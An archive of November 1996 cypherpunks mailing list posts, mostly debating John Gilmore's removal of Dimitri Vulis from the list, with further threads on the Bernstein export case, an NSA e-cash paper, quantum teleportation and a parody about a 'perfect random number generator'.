Content-Type: text/plain


Lucky Green wrote:
> In the recent hearing of the Bernstein case, Anthony Coppolino for the
> Justice Department said:
> "We don't care about the theory; we don't care about
> the idea Mr. Bernstein has, which was to take a particular type
> of algorithm and use it to allow for an encrypted interactive
> conversation.  That's his idea.
> We don't care about his idea; we care about the
> result of what it can do."

[snip]

Could I suggest a translation?  "We're going to trust Professional Government Consultant 
Organization XYZ to tell us about Mr. Bernstein's idea, since we obviously won't 
understand Mr. Bernstein's own explanation."  (And we do care about his idea, but we 
can't admit that, because it would make us look stupid)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 3 Nov 1996 09:37:28 -0800 (PST)
To: Chris Adams <adamsc@io-online.com>
Subject: Re: Discrete logs 1 [non-cryptography related annecdote] [NOISE]
In-Reply-To: <19961103071134640.AAD224@localhost>
Message-ID: <327CD820.6408@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc wrote:
> On Thu, 31 Oct 1996 09:16:26 -0800, Hal Finney wrote:
> >properties than regular logarithms, but I thought this bit of history
> >would spark some memories in old-timers and give a new perspective for
> >younger people.

[snip]

> The same thing goes on with SATs and especially SAT-IIs.   Some higher-end
> calculators, esp. HPs, have plugin cartridges which automate much of the
> basic work in chemistry, physics, etc.  I never saw anyone who used such
> things even get asked about it.  Do we even need social engineering with
> people this stupid?

Technology has a base, much like a pyramid.  When you add enough layers, you can't
find very many people who can traverse top to bottom and understand all of what's
in between.

I consider it a miracle when a student has the quality of consciousness to buck the
trend and get themself a quality instrument (such as an HP-48SX/GX), since once they
do that, they might be encouraged to explore further.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 3 Nov 1996 09:59:14 -0800 (PST)
To: CP <cypherpunks@toad.com>
Subject: Re: [NOISE]Re: Dr. Vulis
Message-ID: <199611031759.JAA05324@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About  3 Nov 96 at 14:46, Derek Bell wrote:

>  I'm not happy with the barring of Vulis from the list

Just want to add my 2 cents.  I am also unhappy with the fact that he 
was removed.  My personal correspondence with Vulis has been friendly 
and he has been very helpful.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 3 Nov 1996 12:11:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Telling quote from Bernstein hearing
Message-ID: <3.0.32.19961103121133.006aa318@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:31 AM 11/3/96 -0800, Dale Thorn <dthorn@gte.net>
 wrote:
>Lucky Green wrote:
>> In the recent hearing of the Bernstein case, Anthony Coppolino for the
>> Justice Department said:
>> "We don't care about the theory; we don't care about
>> the idea Mr. Bernstein has, which was to take a particular type
>> of algorithm and use it to allow for an encrypted interactive
>> conversation.  That's his idea.
>> We don't care about his idea; we care about the
>> result of what it can do."
>
>[snip]
>
>Could I suggest a translation?  "We're going to trust Professional
Government Consultant 
>Organization XYZ to tell us about Mr. Bernstein's idea, since we obviously
won't 
>understand Mr. Bernstein's own explanation."  (And we do care about his
idea, but we 
>can't admit that, because it would make us look stupid)

Heh :)

I think that Lucky hit on a choice quote from Coppolino -- it was really at
the heart of his arguments.

Since Judge Patell ruled that source code is speech, the ground has really
shifted from just limiting crypto to limiting Bernstein's freedom of
speech, and this is much to the government's disadvantage.

Coppolino tried to avoid the issue by claiming that the government is not
interested in restraining Bernstein's ideas (claiming several times that
the government does not interfere with academic discussion of crypto), but
that they want to impede the specific functionality of Snuffle.

Bernstein's attorney, Cindy Cohn, aptly replied that the ideas behind the
crypto _dictate_ the functionality, and that you can't restrain one without
affecting the other (or words to that effect).

I don't think that Coppolino meant that they do not understand Bernstein's
ideas :)  (though perhaps he does not...)



Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 3 Nov 1996 12:19:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: more interesting ITAR/CJ stuff @ eff.org
Message-ID: <3.0b28.32.19961103123043.0074e3e0@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



In addition to the transcript of the 9/20 hearing that Lucky mentioned,
there's other good (new) stuff in EFF's archive, including a declaration
from an editor with MIT Press where he indicates he was told informally
that the NSA had asserted that the paper copy of the PGP Source Code book
was subject to the ITARs. (There was no official response made, two
printings were sold out, and the book has gone out of print.)

<http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/>,
"961004_prior.declaration"


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 4 Nov 1996 12:57:46 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Thank you, John Gilmore, for protecting freedom of spee
Message-ID: <847122169.8846.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Ironic how the list championed flooding Germany(?) with material in response to their
> suppression of certain "objectionable" material, then gets into this sticky wicket.

Absolutely, 

As much as I might hate Vulis`s stuff (and believe me I do). It is no 
justification for removing him from the list. We are supposed to be a 
platform for the discussion of cryptography but as the list has 
become more and more a libertarian platform for ideas and discussion 
we cannot really justify censorship in this way. I very much wish I 
could say that I agreed with John but I cannot do so with a clear 
conscience.



 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 4 Nov 1996 14:02:46 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Dr. Vulis is not on cypherpunks any more
Message-ID: <847122169.8851.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> The short answer is, No. 

Their problem.

> More specifically, we constantly have
> a stream of new readers sampling Cypherpunks.  Some are 
> technically sophisticated; some are not.  In either case, new
> readers do not have the historical perspective not to fall for
> Dimitri's big lies. 

It is not a requirement in a libertarian forum to tell the truth.

You also seem to be implying that people need protecting from 
Dimitri, much the same authoritarian argument we hear from govt. 
about people needing to be protected from porn/drugs/free spech etc.

> Nor do they have any way of know what an
> abberation his sort of behavior is on this list.  "So this is
> what Cypherpunks are like," would be a sad, but understandable
> misinterpretation of what we're all about.  What John did was 
> appropriate.

I understand the point here but I suggest a note at the top of the 
"welcome to cypherpunks" note every new subscriber gets explaining 
who Dimitri is and how to set up their mailer software to block his 
posts.

 
 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 4 Nov 1996 14:02:44 -0800 (PST)
To: Computer Virus Help Desk <cvhd@indyweb.net>
Subject: Re: Dr. Vulis is not on cypherpunks any more
Message-ID: <847122169.8850.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Well put!  I tired a long time ago of Dr. Vulis and several others on this
> list.  Rather than bitch about it or resort to the same big brother
> gestapo-censor bullshit we profess to abhor I simply utilized the extensive
> filtering capability of Eudora.
> 
> I don't need "big brother" or big "cypherpunk" censoring my mail for me.
> We have become what we fear the most.  How prophetic and pathetic.

Absolutely,

John, if you, and those who support your actions, claim to be 
libertarians you need to take a good hard look at what you have done.

This is a distinctly "big cypherpunkish" move and really cannot be 
condoned even bearing in mind the inane and wearisome behaviour of 
Dr. Vulis.


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Vince-Jillings (Sean Vince-Jillings) (Sean Vince"Jillings) <sean@milkyway.co.za>
Date: Sun, 3 Nov 1996 03:52:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Montgolfiering, the Hot Air Balloon of Cryptography -Reply
Message-ID: <s27ca6e6.075@arup.co.za>
MIME-Version: 1.0
Content-Type: text/plain


nobody quoth

>Fie on the small minds that cackle at my brilliance! As a Mensa member
>and
>founder of the Society for Superintelligent Former NSA Employees, I
>chortle
>at the baseness of callow criticisms by those doubters and dilletantous
>denigrators of virtual one-time pads and PRNGs (perfect random
>number
>generators).

So Mr Smarty Pants, how does it feel to be the second most intelligent life
form on the planet? Your polysyllabic phrasing does not fish you from
the unfortunate and precarious position of only being in the second most
august and lofty eyrie of intellect in the upward spiral of extropian
realisation.

Ha!

As the Shadow president of the Alien Consortium that controls MENSA
through the Boy Scout Freemason Recruitment Program, I refute your
dubious and somewhat ill-considered claims to being the very paragon of
intelligence.

>Montgolfiering. What is it, you ask? It is demonstrably a new paradigm in
>the evolution of homo sapiens (Parry Messger excepted) toward
>Shannon's
>dream of a one-time pad needing only a single, easily memorizable
>number as
>a seed.  I have heard only silence when I challenged the so-called
>superbrains of this latargial list to try to determine which number I am
>using as the seed of my system. If you are such great smarty pants, far
>smarter than my colleagues at the NSA and at Mauchly-Wood, why can
>you not
>then determine this number? 

I can.

>Could it be because I have outsmarted
>you?
>Could it be because I understand the Sufi secrets of picking random
>numbers
>truly randomly? I submit this to you: 8  31  26  3  19. Now, oh great
>ones,
>tell me, what is the next number in this sequence?

11. Prove me wrong.

>
>Ha, you cannot predict this next number, can you, oh gibbering
>greatnesses?

Bullshit. I just did

>Ths proves that my perfect random number genarator (PRNG, for those
>of you
>too stupid to remember) 

PRNG.Its hard to forget such a stupid name. 

>cannot be broken. Q.E.D.
>
>I question the issue of Parry Messger's objectivity in assessing the
>brilliance of my importations and acidulous assertations. I question
>whether Parry may have a peculiarly pecuniary interest in these
>affairs?
>Does Parry have an insider, or other position, or interest in one or more
>of the RSA interest? If, this explains his fantastical faith in the core of
>this so-called "RSA" system, which I proved to my colleagues at NSA
>could
>not possibly be valid. Why, you ask? Because it contains no virtual
>seed,
>and that which has no seed cannot grow. Q.E.D.--it has been
>debunked.

No, it only looks debunked because your mind has been unhinged.

>
>Entropy, you quibble? Ha! What is entropy but thermodynamics? And
>what is
>the topic of thermodynamics, you small-minded ensemble (Gibbs)
>people who
>never worked for the NSA may ask? Thermodynamics is about hot air.
>Hot air
>is in balloons. Balloons were pioneered by the Montgolfiers. Thus we
>come
>full circle (can you understand this, you mental midgets?).  Q.E.D.--it
>has
>been demystified.

No. It has been filled with hot air in the hope that the argument will float. 

>
>Montgolfiering = a new virtual one time pad based on hot air. Eureka! I
>have found it.
>
>P Information = P * log_base_infinity P

Log_base_infinity? You can't quantify this? The name for this kind of
tricky sum is in fact, rhetoric.

>I laugh at your sanctimonious snivelings, your bombastic bombardings,
>and
>your fatuous flatulations.

I laugh about your need to be so prissy about a simple fart.

>(Montgolfiering. Q.E.D.--"it has been deflated")

heh. yeah right.

GAIAWired





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 3 Nov 1996 11:13:57 -0800 (PST)
To: Dale Thorn <zaid@hardnet.co.uk>
Subject: Re: 'what cypherpunks is about' [RANT]
Message-ID: <3.0b36.32.19961103141126.00b581f0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 11/2/96 -0800, Dale Thorn wrote:
>Following similar logic was Teddy Roosevelt, then the mad fire-bombers of
World War 2,
>capped by the ultimate terrorist fire-bombing of all at Hiroshima and
Nagasaki, then
>by immense fire-bombing of Vietnam, Cambodia, Laos, etc., followed by
prodigious fire- 
>bombing of Iraq and a deliberate fire-bombing and massacre of retreating
troops at the
>end of the "Gulf War".  Fighting the U.S. can be literal Hell!

Terror bombing of civilians was a European not an American invention, though.

>Quick, how many times have you heard this pro-interference argument?  The
pro- people
>will even show "proof" that the "savages" (it actually says this in the
United States
>Declaration of Independence) were as mean to each other as the invaders
were to them.
>What they fail to say, however, is that the "meanness" in such things as
human sacrifice 
>and so forth were imported to native cultures by "god-like" superiors who
descended on
>the locals to "help" them to the next level of technology and
hero-worship.  Fooey!

The death rate among civilians in many pre civilized wars was as high as
civilian death rates in many of our 20th Century wars.  We have the piles
of bones to prove it.  In addition to peonage, serfdom, chattel slavery and
the treatment of women as chattels, pre civilized people were considerably
more xenophobic than the worst US redneck.  Many had problems accepting the
denizens of the next village a few miles away.  They tended to be racists
as well.  And did I forget to mention infanticide and royalism.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kwit@iap.net.au
Date: Sun, 3 Nov 1996 22:22:56 -0800 (PST)
To: Elizabeth McLean-Knight <mcleane@stu.beloit.edu>
Subject: Re: beth mclean-knight
In-Reply-To: <9611040151.AA16922@stu.beloit.edu>
Message-ID: <327D1A6F.6BB8@iap.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Elizabeth McLean-Knight wrote:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Norman Hardy <norm@netcom.com>
Date: Sun, 3 Nov 1996 14:40:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: NSA Report: Anyone seen this?
Message-ID: <v03007803aea2c9c2042d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I just finished reading the report "How to Make a Mint: The Cryptography of
Anonymous Electronic Cash" by Law, Sabett & Solinas. It can be found at
<http://jya.com/nsamint.htm>.

It is very well written with only identification of the issues except in
the last short paragraph where they clearly lean toward government
interests.

They identify and distinguish interests of the bank, the consumer's
privacy, and the government. Some of the measures that they describe
(providing for traceability) might well be done by a bank operating in an
anarchy. Imagine that you are running a bank in an anarchy and the son of
one of your good customers is kidnapped and held for ransom. Suppose that
the kidnapper is a good customer of another bank with whom you have an
arm's length relation. The arguments are not simple. Only towards the end
does the paper begin to conflate the interests of the government and the
bank. Some of the law enforcement purposes that they describe would apply
to the anarchy bank, others would not.

The paper is the best description I have seen of several advanced money
schemes. It has a better description of Chaum's off-line scheme than I had
seen before. It describes sever even more advanced schemes, both abstracted
form the mathematical details, and then with the details filled in.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sun, 3 Nov 1996 06:46:57 -0800 (PST)
To: CP <cypherpunks@toad.com>
Subject: [NOISE]Re: Dr. Vulis; John was right!
Message-ID: <9611031446.aa18095@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	I'm not happy with the barring of Vulis from the list: sure he was
a kook and he posted many ad-hominem messages*, but I feel a mini-FAQ would
deal with the matter better. Explain the background to his tantrums** and
explain how to filter out messages with various mail packages.

*	I think Vulis was really unfair to Tim May, even though I find myself
disagreeing strongly with what Tim has to say on some matters. At least Tim
has posted interesting, thought-provoking, crypto-related material.

**	Ok, so `tantrums' is an understatement...

	Derek Bell

PGP key available at: http://www.maths.tcd.ie/~dbell/key.asc
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAgUBMnywVFXdSMogwMcZAQEi2QQAhMWJWTz1RtBvyiYHAyzfkSSxZ+8U8rq7
xF3JD4s78rMcDcfzY0Q/5XRnPTCH/M6YI54cA/EpAEYys0Ws0VWgJoMxdBcbhitI
1zbFdUQJqzrKLlvP/n6KN2jImQeHqYUeSgsnoNgfn4Uo9KpBtxbUjKwEmco9VV8y
fxoVHAYPTsg=
=yk8t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sun, 3 Nov 1996 15:20:37 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: FW: Dr. Vulis is not on cypherpunks any more
Message-ID: <01BBC99A.AF44F860@king1-23.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


Those of you who think that it was wrong, unwarranted censorship for John Gilmore to take Dr. Vulis off the list should note this sentence from John's message:

	When he posted a message saying that we'd
	have to use technical means to stop him from 
	flaming the list, I said, "OK".


It was Vulis who challenged John to stop him by technical means.  It was at John's discretion to do so, and he took the liberty of  following up on Vulis' challenge.

Vulis did everything to set himself up for what he got, did he not.

   ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 3 Nov 1996 12:30:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Thank you, John Gilmore, for protecting freedom of speech against Dr. Dmitri
In-Reply-To: <327C4C35.1FD8@gte.net>
Message-ID: <BL4TwD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> But there's probably a logical reason for taking this "action",

Such as someone being an effeminate long-haired limp-wristed bitch... :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 3 Nov 1996 15:53:58 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: [NOISE]Re: Dr. Vulis
In-Reply-To: <199611031759.JAA05324@adnetsol.adnetsol.com>
Message-ID: <Pine.SUN.3.91.961103153835.17227A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> Just want to add my 2 cents.  I am also unhappy with the fact that he 
> was removed.  My personal correspondence with Vulis has been friendly 
> and he has been very helpful.

Then I suggest that Ross not remove Dimitri from his private 
e-mail correspondence.  On this list, however, Dimitri was NOT 
friendly NOR helpful.  

Wha do Ross' or anyone else's private interactions have to do 
with the decisions of those who pay for this list's existance?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 3 Nov 1996 17:09:50 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: [NOISE]Re: Dr. Vulis
Message-ID: <199611040109.RAA12798@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About  3 Nov 96 at 15:44, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> > Just want to add my 2 cents.  I am also unhappy with the fact that
> > he was removed.  My personal correspondence with Vulis has been
> > friendly and he has been very helpful.
> 
> Then I suggest that Ross not remove Dimitri from his private 
> e-mail correspondence.  On this list, however, Dimitri was NOT
> friendly NOR helpful.  
> 
> Wha do Ross' or anyone else's private interactions have to do 
> with the decisions of those who pay for this list's existance?

In fact, nothing.  I just wanted to show that this coin has 2 sides.

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sun, 3 Nov 1996 08:17:49 -0800 (PST)
To: dthorn@gte.net
Subject: Re: Thank you, John Gilmore, for protecting freedom of speech against Dr. Dmitri Vulius [RANT]
Message-ID: <199611031617.RAA18700@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


> But there's probably a logical reason for taking this "action", although it can
> apparently be easily circumvented, even though many of us don't understand what
> that logic could be.

Yes.  If only you knew what they knew ... :-)

The mail filter is dead! Long live censorship, double standards and hypocrisy!

Gary




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 3 Nov 1996 18:17:25 -0800 (PST)
To: blanc <blancw@cnw.com>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more
Message-ID: <3.0b28.32.19961103181709.0071c978@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:08 PM 11/3/96 -0800, blanc <blancw@cnw.com> wrote:

>Vulis did everything to set himself up for what he got, did he not.

Indeed - my hunch is that this is the result that Vulis was determined to
get, and would have done whatever was necessary to bring it about. Now he
can cry that he is the "victim" of evil censorship, and he can wear the
white hat of virtue - notwithstanding that he consciously sought to be
censored, and has himself contributed mightily towards the (temporary)
destruction of an otherwise useful list. Now he can leave the list with his
"virtue" and his pride intact; something he could not have done had he
simply unsubscribed himself.

There are plenty of people who would have (and will) help him if he manages
to come up with something on-topic to say. But, short-term, he's gotten
what he was looking for (a chance to play victim) and we get a list with
less crap on it.

Perhaps we should have a moment of silence for Dmitri Vulis, sympathetic
victim, target of dastardly censors, paragon of virtue and righteousness.
I'll go ahead and have mine now. 

Given that John Gilmore is the source of the oft-repeated "The net sees
censorship as damage and routes around it" quote, it strikes me as unlikely
that he took the steps he did without some reflection on their meaning,
consequences, and chances of success.

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 3 Nov 1996 18:40:00 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Telling quote from Bernstein hearing
In-Reply-To: <Pine.3.89.9611022225.A214-0100000@netcom9>
Message-ID: <Pine.SUN.3.91.961103183821.8637A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Tony Coppolino was also the Justice Department's lead attorney in the CDA 
case in Philadelphia. The Feds are grooming lawyers who have a clue about 
the Net.

-Declan



On Sat, 2 Nov 1996, Lucky Green wrote:

> In the recent hearing of the Bernstein case, Anthony Coppolino for the 
> Justice Department said:
> 
> 
> "We don't care about the theory; we don't care about
> the idea Mr. Bernstein has, which was to take a particular type
> of algorithm and use it to allow for an encrypted interactive
> conversation.  That's his idea.
> We don't care about his idea; we care about the
> result of what it can do."
> http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/Legal/
> 960920.transcript
> 
> Encrypted interactive conversations seem to be something to be concerned 
> about...They are afraid of us.
> 
> -- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
>    Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
>    Vote Harry Browne for President.
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will French <wfrench@interport.net>
Date: Sun, 3 Nov 1996 15:54:26 -0800 (PST)
To: dlv@bwalk.dm.com
Subject: Censorship on cypherpunks
Message-ID: <199611032354.SAA01354@interport.net>
MIME-Version: 1.0
Content-Type: text/plain


  Except it's not very effective, is it, since he's still
posting flames?  In any case, it's an admission on John
Gilmore's part that libertarianism can't work without some
measure of authoritarianism; the only argument is over _just how
much_ authoritarianism we need.
  
  I'm quite upset about this.  Up to now I was able to tell
people that "there is at least one mailing list on the net that
functions in a completely open manner".  No more.


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 3 Nov 1996 18:54:39 -0800 (PST)
To: Gary Howland <gary@systemics.com>
Subject: Private censorship or free speech?
In-Reply-To: <199611031617.RAA18700@internal-mail.systemics.com>
Message-ID: <Pine.SUN.3.91.961103184429.8637C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


With the right to speak freely comes the right to decline to speak. John, 
as the owner of the computer maintaining the cypherpunks list, has the 
right to decline to speak and to kick off a user who violates the 
covenant of the mailing list.

The kicked-off user has the right to start his own mailing list with
different standards. If he likes, he can establish the rules as a type of
contract to which participants must agree. And observers can criticize
either or both of them. 

Is this censorship, double standards, and hypocrisy? I think not.

I say this as someone who has no animus towards Vulis. I've communicated
with him cordially in private email. 

-Declan


On Sun, 3 Nov 1996, Gary Howland wrote:

> > But there's probably a logical reason for taking this "action", although it can
> > apparently be easily circumvented, even though many of us don't understand what
> > that logic could be.
> 
> Yes.  If only you knew what they knew ... :-)
> 
> The mail filter is dead! Long live censorship, double standards and hypocrisy!
> 
> Gary
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 3 Nov 1996 19:27:15 -0800 (PST)
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: [NOISE]Re: Dr. Vulis
In-Reply-To: <199611031759.JAA05324@adnetsol.adnetsol.com>
Message-ID: <327D5E70.69B5@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ross Wright wrote:
> On or About  3 Nov 96 at 14:46, Derek Bell wrote:
> >  I'm not happy with the barring of Vulis from the list

> Just want to add my 2 cents.  I am also unhappy with the fact that he was removed.
> My personal correspondence with Vulis has been friendly and he has been very helpful.

Someone (Gilmore?) mentioned new subscribers being a problem, not knowing how to filter
and so on.  Would periodic postings for new subscribers, in addition to the initial
welcome message, be a possible solve for this?

Please don't curse me for this next idea, as I'm not really familiar with what goes on
on a mail server:  How about if everyone could send to the list with the subject line
containing in [] brackets one of several strings from a list maintained by the server,
examples being [NOISE], [RANT], [CRYPTO], [NEWS] etc., and for postings without one of
the selections, the line could default to [NOISE] or whatever.

I don't mean to propose anything heavy-handed, but there ought to be a way to apply
a *little* more technology to get a *little* cleaner list, without impeding the "lower 
end" of the signal.  Unless, of course, there are other technical or personal reasons
for blocking the "Doctor" that I'm not aware of.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 3 Nov 1996 19:35:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Telling quote from Bernstein hearing
Message-ID: <3.0.32.19961103193619.006913a4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:39 PM 11/3/96 -0800, Declan wrote:
>Tony Coppolino was also the Justice Department's lead attorney in the CDA 
>case in Philadelphia. The Feds are grooming lawyers who have a clue about 
>the Net.

Actually, Coppolino mentioned the CDA in the Bernstaein hearing.  I haven't
gone through the transcript, but the gist of his point was that, while the
Judges in Philly had found that the CDA was prior restraint, ITAR was not
(or something similar).

I did not find his arguments very persuasive -- he seemed stuck on the idea
that crypto is not speech, when that had already been ruled against by
Judge Patel.

He may have been trying to make the record clear, for possible appeal.


Rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Nov 1996 16:45:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: VOO_doo
Message-ID: <1.5.4.32.19961104004426.006be7a8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


October 25 Science reports on the latest teleportation research
in "To Send Data, Physicists Resort to Quantum Voodoo."

It describes a laser-driven apparatus for transmitting highly
secure encoded (but not encrypted) messages via entangled
photon states.

IBM's Charles Bennett says, "as other researchers work to
harness quantum mechanics for computation and
cryptography, teleportation could become the equivalent
of a quantum mail service."

-----

http://jya.com/voodoo.htm

VOO_doo  (txt)

Science is at: http://www.sciencemag.org/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mcleane@stu.beloit.edu (Elizabeth McLean-Knight)
Date: Sun, 3 Nov 1996 17:49:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: beth mclean-knight
Message-ID: <9611040151.AA16922@stu.beloit.edu>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abusebot@savetrees.com (Mail AutoResponder)
Date: Sun, 3 Nov 1996 16:10:04 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: RESPONSE FROM CYBERPROMO
Message-ID: <199611040106.UAA15906@gamut>
MIME-Version: 1.0
Content-Type: text/plain



Version 10-9-96:


Cyber Promotions has started to implement stricter Terms of Service
policies WITH TEETH.  We have just recently terminated several accounts for
abuse of our policies.  (Updated TOS at end of message).

The following email accounts have been *recently TERMINATED...

*jrtkjs@savetrees.com         10-9-96: Forgery and spamming INTERNET
*jrtkjs@answerme.com          ""      ""       ""     ""     ""     ""
